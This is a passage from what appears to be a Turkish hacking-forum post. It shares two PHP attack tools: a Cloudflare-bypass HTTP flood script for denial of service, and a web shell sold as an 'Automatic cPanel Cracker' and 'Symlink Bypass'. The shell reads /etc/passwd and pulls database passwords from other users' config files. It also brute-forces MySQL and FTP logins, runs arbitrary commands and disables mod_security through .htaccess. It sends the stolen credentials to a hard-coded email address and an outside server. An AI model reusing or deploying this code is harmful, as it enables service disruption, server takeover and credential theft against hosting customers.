.NET CLR 1.1.4322)", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)", "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1", "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1", "Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5", "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)", "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)", "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4", "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1", "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1", ); $end = time() + $argv[4]; $threads = $argv[3]; $failed = 0; $succeed = 0; echo "Cloudflare Bypass yasak-icerik to fearless\n"; echo "Starting cf bypass on $argv[1] for $argv[4] seconds with $argv[3] threads\n"; for($i = 0; $i < $threads; $i ++){ $pid = pcntl_fork(); if($pid == -1) { echo "Forking failed on $i loop of forking.\n"; exit(); } elseif($pid) { continue; } else { if(!(strpos($argv[2], "dog"))) { $proxy = rand_line($argv[2]); } else { $proxy = NULL; } $ua = $useragents[array_rand($useragents)]; $bypasscookie = bypassyourdog($argv[1], $ua, $proxy); if(strlen($bypasscookie) > 70) { while($end > time()) { $flood = curl_init(); curl_setopt($flood, CURLOPT_URL, $argv[1]); curl_setopt($flood, CURLOPT_RETURNTRANSFER, 1); curl_setopt($flood, CURLOPT_USERAGENT, $ua); curl_setopt($flood, CURLOPT_FOLLOWLOCATION, true); curl_setopt($flood, CURLOPT_PROXY, $proxy); curl_setopt($flood, CURLOPT_COOKIE, $bypasscookie); $flood123 = curl_exec($flood); curl_close($flood); } } die(); } } for($j = 0; $j < $threads; $j++) { $pid = pcntl_wait($status); } ?> ==================================================================== ==================================================================== ==================================================================== ==================================================================== ==================================================================== Linux Symlink Bypass <?php @ini_set('output_buffering',0); @ini_set('display_errors', 0); echo '</head><body>'; echo " <html> <body bgcolor=black> <head> <style type=text/css> body{ background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFwAAAAuCAMAAACS246gAAAALVBMVEUREREMDAwSEhIUFBQQEBAODg4TExMPDw8XFxcVFRUWFhYNDQ0LCwsKCgoJCQmoaA8gAAACwElEQVR42rWW227tIAxEuYYQSP//c5ul0YicnL6CVIntmkXsMYYQQnxGSjmXEmOtIeR8HK3F2FrO53kctcZYSs69X1cI4xkhXFfv+M/Z2vWMWuczjuO6ln/Oe+FC984Y477nDAHkGMLjzjyE3oVm5k8BFALf2Bp2o/Uhu+GgU2otpRDm1G+WCo8bS0CBBpWSfh8HGztpb7Q+ZC8ccXJGmjGQcqEJ1SECQTJJOScjpes6z5RilP2LxroTrpCYIg1lJXRKcresKWmOmKCxlnIcpFQJXGiUhLcXPgYGBJVcKjcOFQvfeOb2Vvk5OcK/0fiNsRtOOmzETDGyFKjwbgU5K3SElMSGC7fQIWDdCyckB8TcSaAVaGnOamPvtkRrc5vD9j8a4ffCQRpPKJJTpcfBAgl+TjYw6luiRqsomNVayl44i0G6/RivKwOM8DEiH7hSvNH3yPvyUPMeYy+8VpxASiCcQKaEJG4FILH2zpZfNDhJyR+HD58598JxVDrmvO8YkbU1I3P2nCvi73ZAAi1la8Yj9F64gyQUHAxc+FKwg/ui5ywFD7x9kSA3eBrEXjjNyMcDOX3YhZTF194XHSPPECWUJkfy/Oig0e2FKw1jsMhozXUZkBCCpczeaLYDgngIaVFdiOD3wnE2MqV3cyVh9zNSegIMXzRtVwmgRGGM4Qah50ate+EEpofyCpzNaAUcdf3++8hbaoRc7UwlwlZ74Uq9ZfXDjACx+xn6RVO4bO7Ck4Rs4kcrH7YXLrMkpOAcGPhS/i1Oo7HGyLp1Ba708lmSeC9c6VBqDCJcjgQgW3yQQKs9cZF5c1+GoGHRoPfDe5fJ/16PBhcnAYO4b1/Ftq82ZbRSotleeO/nSZALD2bhsTP34X4/2Yz2tcYcNKX88xPjXrikQ9K3LOBx8yUMUi1qoZHVJYjXfRut9SFshf8CHnhfSb7xpWAAAAAASUVORK5CYII=') } input[type=text] { color:black; } a { color : white; } #terma { color:black; } #kernel { } #exec { color:red; } #zeb { width: 525px; height: 301px; color:black; } input[type=submit] { background-color : black; } a:hover{ border-bottom:1px solid aqua; } *{ font-size:11px; font-family:Courier,Courier,Courier; color:white; } #menu a{ padding:4px 18px; margin:0; background:darkred; text-decoration:none; letter-spacing:2px; -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px; } </style> <title>Automatic cPanel Cracker</title> </head> <br><center><div id=menu> <a href=?home>Home</a> <a href=?grab>Config</a> <a href=?cp>cPanel Automatic</a> <a href=?cp_jump>cPanel Jumping</a> <a href=?upl>Upload</a> </div></center> <p> <center> <img src=http://www.turkhackteam.org/images/thtson2.png /><br /></center><br><center><div id=menu> <a href=?jump>Jumping</a> <a href=?pws>Config Password</a> <a href=?x=symlink>Symlink</a> <a href=?cmd>CMD</a> <a href=?cp_cracker>cPanel Brutus</a> </div></center> <br><br><center id='kernel'>".php_uname()."<br>"; echo '<img src="http://ww3s.ws/TR/HTML5/CSS3/fsocity.jpg" height="0" width="0">'; if(isset($_GET["cp_jump"])){ echo ''; ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>'); set_time_limit(0); @$passwd = fopen('/etc/passwd','r'); if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); } $pub = array(); $users = array(); $conf = array(); $i = 0; while(!feof($passwd)) { $str = fgets($passwd); if ($i > 35) { $pos = strpos($str,':'); $username = substr($str,0,$pos); $dirz = '/home/'.$username.'/public_html/'; if (($username != '')) { if (is_readable($dirz)) { array_push($users,$username); array_push($pub,$dirz); } } } $i++; } echo '<h1>CPaneL BruteForcer</h1><div class="transparan2"><br><br><textarea id=terma cols="100" rows="20">'; echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"; echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"; echo "[~] Searching for passwords in config files...\n\n"; foreach ($users as $user) { $path = "/home/$user/public_html/"; read_dir($path,$user); } echo "\n[+] Done\n"; function read_dir($path,$username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath = "$path$file"; if (($file != '.') and ($file != '..')) { if (is_readable($fpath)) { $dr = $fpath."/"; if (is_dir($dr)) { read_dir($dr,$username); } else { if ( ($file=='config.php') or ($file=='config.inc.php') or ($file=='conf.php') or ($file=='settings.php') or ($file=='configuration.php') or ($file=='wp_config.php') or ($file=='wp-config.php') or ($file=='inc.php') or ($file=='setup.php') or ($file=='dbconf.php') or ($file=='dbconfig.php') or ($file=='db.inc.php') or ($file=='dbconnect.php') or ($file=='connect.php') or ($file=='common.php') or ($file=='config_global.php') or ($file=='db.php') or ($file=='connect.inc.php') or ($file=='e107_config.php') or ($file=='dbconnect.inc.php')) { $pass = get_pass($fpath); if ($pass != '') { echo "[+] $fpath\n$pass\n"; ftp_check($username,$pass); } } } } } } } } function get_pass($link) { @$config = fopen($link,'r'); while(!feof($config)) { $line = fgets($config); if (strstr($line,'pass') or strstr($line,'pwd') or strstr($line,'db_pass') or strstr($line,'dbpass') or strstr($line,'passwd')) { if (strrpos($line,'"')) { preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass); $pass = str_replace("]=\"","",$pass); } else preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass); $pass = str_replace("]='","",$pass); return $pass[2]; } } } function ftp_check($login,$pass) { @$ftp = ftp_connect('127.0.0.1'); if ($ftp) { @$res = ftp_login($ftp,$login,$pass); if ($res) { echo '[FTP] '.$login.':'.$pass." Success !\n\n"; $domain = $_SERVER['HTTP_HOST']; $p21 = 21; $p22 = 22; $p2082 = 2082; $cp22 = fsockopen($domain,$p22,$errno,$errstr,10); $cp21 = fsockopen($domain,$p21,$errno,$errstr,10); $cp2082 = fsockopen($domain,$p2082,$errno,$errstr,10); if(!$cp22) {$a1="Error";} else {$a1="Success";fclose($cp22);} if(!$cp21) {$a2="Error";} else {$a2="Success";fclose($cp21);} if(!$cp2082) {$a3="Error";} else {$a3="Success";fclose($cp2082);} $psn =" -------------------------------------------------------------------------\n Host : $domain\n User : $login\n Pass : $pass\n -------------------------------------------------------------------------\n Accept Port \n SSH : Port $a1\n FTP : Port $a2\n cPanel : Port $a3\n -------------------------------------------------------------------------\n n"; $to = "emre.can.aslan@outlook.com"; $recip = "emre.can.aslan@outlook.com"; $subject = "cPanel AccesS Update"; $headers = "From: update<emre.can.aslan@outlook.com>"; mail($to,$subject,$psn,$headers); mail($recip,$subject,$psn,$headers); echo '[SSH] Port' .':' .$a1. " !\n\n"; echo '[FTP] Port' .':' .$a2. " !\n\n"; echo '[cPanel] Port' .':' .$a3. " !\n\n"; } else ftp_quit($ftp); } } echo '</textarea><br><br><b>BruteForce Completed ...</b></body></html>'; } if(isset($_GET["cp_cracker"])){ if(function_exists('apache_setenv')){ @apache_setenv('no-gzip', 1);} @ini_set('zlib.output_compression', 0); @ini_set('output_buffering ',0); @ini_set('implicit_flush', 1); @ob_implicit_flush(true); @ob_end_flush(); $ipserver=$_SERVER['SERVER_ADDR']; echo ' <html> <style> body {font-size: 12pt; font-family: "Times New Roman"; }</style><head> </head> <title>cPanel brutus</title> <body text="#00FF00" bgcolor="#000000" vlink="#00BFFF" link="#FF0000" alink="#008000"> <div align="center"> <br> </td></tr> </table> <br />'; if(!isset($_POST['submit'])){ function execute($cfe) { $res = ''; if ($cfe) { if(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } else if(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } else if(function_exists('shell_exec')) { $res = @shell_exec($cfe); } else if(function_exists('exec')) { @exec($cfe,$res); $res = join("\n",$res); } else if(@is_resource($f = @popen($cfe,"r"))) { $res = ''; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } $default=execute("ls /var/mail"); if(!$default){ if($file=@file_get_contents('/etc/passwd')){ $u=explode("\n",$file); foreach($u as $us){ $uss=explode(":x:",$us); $default .=$uss[0]."\n"; } }else if(function_exists('posix_getpwuid')){ for($n2=500;$n2<10000;$n2++){ $userinfo = posix_getpwuid($n2); $name=$userinfo['name']; if($name!=''){ $default.=$name."\n"; } }}else{$default="Could not get any username.try manually :)";} } echo <<<EOF <form method="POST"> <div align='center'> <table width='55%' style='border: 2px dashed #FF0000; background-color: #000000; color:#C0C0C0'> <tr> <td align='center'> <span lang='en-us'><font color='#FF0000'><b>Usernames:</b></font></span> <p align='center'>&nbsp;<textarea rows='30' name='usernames' cols='30' style='border: 2px dashed #FFFFFF; background-color: #000000; color:#C0C0C0'>$default</textarea><br/> </p></td> <td align='center'> <span lang='en-us'><font color='#FF0000'><b>Passwords:</b></font></span> <p align='center'>&nbsp;<textarea rows='30' name='passwords' cols='30' style='border: 2px dashed #FFFFFF; background-color: #000000; color:#C0C0C0'>123123\n123456\n1234567\n12345678\n123456789\n112233\n332211\ntest\ntest123\ncpanel\npassword\npassword1\nabc123\na1b2c3\npassw0rd\nPassword\nPassw0rd\nuser\npasswd\npasswords\npass\nchangeme\niloveyou\nfuckyou\nadmin\nqwerty\n1q2w3e\nq1w2e3\nqazqaz\n1qazxsw2\n1qaz2wsx\nqazxsw\nqazwsx</textarea><br/> </p></td> </tr> </table><br/><input type='submit' value=' Subtmit ' name='submit' style='color: #FF0000; font-weight: bold; border: 1px dashed #333333; background-color: #000000'></form> EOF; }else{ $password=array_unique(explode("\n",$_POST['passwords'])); $username=array_unique(explode("\n",$_POST['usernames'])); if(!set_time_limit(0)){"<font color='red'><b>ALERT:</b> set_time_limit(0) failed! Cracking will be interrupted!<br/></font>";} echo '[+]Cracking...<br/><hr width="67%" style="border: 4px dashed #FF0000;"><font color="white" size="4"><b>username<font color="red">:</font>password</b></font><br/><br/>'; $count=0; $n=0; $start=time(); foreach($username as $user){ $count++; $user=trim($user); if ( @mysql_connect("localhost",$user,$user) ){echo "<font color='red'>$ipserver|$user</font>|<font color='red'>$user</font><hr width='67%' style='border: 1px dashed #1D1D1D;'>";$n++;continue; $success=$ipserver."|".$user."|".$user."\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,"http://ww3s.ws/ok.php"); curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0'); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success)); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 1); $buffer = curl_exec($ch); } foreach($password as $pass){ $count++; $pass=trim($pass); if ( @mysql_connect("localhost",$user,$pass) ){echo "<font color='red'>$ipserver|$user</font>|<font color='red'>$pass</font><hr width='67%' style='border: 1px dashed #1D1D1D;'>"; $success2=$ipserver."|".$user."|".$pass."\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,"http://ww3s.ws/ok.php"); curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0'); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success2)); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 1); $buffer = curl_exec($ch); $n++;break;} } } $end= time() - $start; @$per=$count/$end; if($n){ echo "[*]Successfully Cracked: <font color='red'><b>$n</b></font><br/>";} echo '<font color="#00FF00">[*]Time took: '.$end.' seconds for '.$count.' tries ('.$per.'/sec)</font><br/>'; } } if(isset($_GET["cmd"])){ echo "<br>"; echo base64_decode("PGZvcm0gbWV0aG9kPSJwb3N0Ij4KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJzdWJtaXQiIHZhbHVlPSJHbyI+CjwvZm9ybT4="); $order=$_POST["command"]; $sub=$_POST["submit"]; if(isset($sub)) { echo "<p id='exec'>".exec($order)."<p/>"; } } if(isset($_GET["grab"])){ echo "<p><font face=Tahoma color=#007700 size=2pt>/etc/passwd content</p><br><form method=POST><textarea id=zeb name=passwd class=area rows=15 cols=60></div>"; echo file_get_contents('/etc/passwd'); echo "</textarea><br><br><input name=cat class=inputzbut size=100 value=Start ! type=submit><br></form></center><br>"; @error_reporting(0); @set_time_limit(0); if($_POST["cat"] && !$_POST["passwd"]==""){ echo "<center>Checking Smylink Functions ...<br></center>"; $functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){ die("<center><font color=red>Symlink Function is DisableD, You Can't Continue This Process !!</font></center>"); } echo "<center>Checking Done Without Problems, Start Grabbing ...<br></center>"; @mkdir("TurkHackTeam", 0755); @chdir("TurkHackTeam"); $htaccess=" Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php <IfModule mod_autoindex.c> IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble </ifModule> <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule> Options +FollowSymLinks DirectoryIndex Sux.html Options +Indexes AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html "; file_put_contents(".htaccess",$htaccess,FILE_APPEND); $passwd=$_POST["passwd"]; $passwd=explode("\n",$passwd); echo "<center>Starting Symlinking ...<br></center>"; foreach($passwd as $pwd){ $pawd=explode(":",$pwd); $user =$pawd[0]; @symlink('/home/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt'); @symlink('/home/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt'); @symlink('/home/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt'); @symlink('/home/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt'); @symlink('/home/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt'); @symlink('/home/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt'); @symlink('/home/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt'); @symlink('/home/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt'); @symlink('/home/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt'); @symlink('/home/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt'); @symlink('/home/' . $user . '/public_html/members/configuration.php', $user . '-members.txt'); @symlink('/home/' . $user . '/public_html/config.php', $user . '-4images1.txt'); @symlink('/home/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt'); @symlink('/home/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt'); @symlink('/home/' . $user . '/public_html/admin/conf.php', $user . '-5.txt'); @symlink('/home/' . $user . '/public_html/admin/config.php', $user . '-4.txt'); @symlink('/home/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt'); @symlink('/home/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt'); @symlink('/home/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt'); @symlink('/home/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt'); @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt'); @symlink('/home/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt'); @symlink('/home/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt'); @symlink('/home/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt'); @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt'); @symlink('/home/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt'); @symlink('/home/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt'); @symlink('/home/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt'); @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt'); @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt'); @symlink('/home/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt'); @symlink('/home/' . $user . '/public_html/home/wp-config.php', $user . '-wp-home.txt'); @symlink('/home/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt'); @symlink('/home/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt'); @symlink('/home/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt'); @symlink('/home/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt'); @symlink('/home/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt'); @symlink('/home/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt'); @symlink('/home/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt'); @symlink('/home/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt'); @symlink('/home/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt'); @symlink('/home/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt'); @symlink('/home/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt'); @symlink('/home/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt'); @symlink('/home/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt'); @symlink('/home/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt'); @symlink('/home/' . $user . '/public_html/home/configuration.php', $user . '-joomla-home.txt'); @symlink('/home/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt'); @symlink('/home/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt'); @symlink('/home/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt'); @symlink('/home/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt'); @symlink('/home/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt'); @symlink('/home/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt'); @symlink('/home/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt'); @symlink('/home/' . $user . '/public_html/configuration.php', $user . '-joomla.txt'); @symlink('/home/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt'); @symlink('/home/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt'); @symlink('/home/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt'); @symlink('/home/' . $user . '/public_html/Settings.php', $user . '-smf.txt'); @symlink('/home/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt'); @symlink('/home/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt'); @symlink('/home/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt'); @

MecTruy
Mesaj tarihi: 03.03.2018 23:06:20
htaccess en güncel apache sistemlerde bile hala tehlikeli oluyor.

Sembolbu
Mesaj tarihi: 05.03.2018 12:22:55
script kaynaklı sorun yaratırmı ?

Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır. Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir. Bu tür konuları spyhackerz [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır. Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to spyhackerz [at] gmail.com Her türlü telif hakkı içerdiğini düşündüğünüz konu url adresini mail adreslerimize gönderebilirsiniz ! ivedilikle işlem yapılacaktır. ( En erken 2 saat içinde En geç 3 gün içinde ) iletişim mailleri: spyhackerz@gmail.com

Hack forum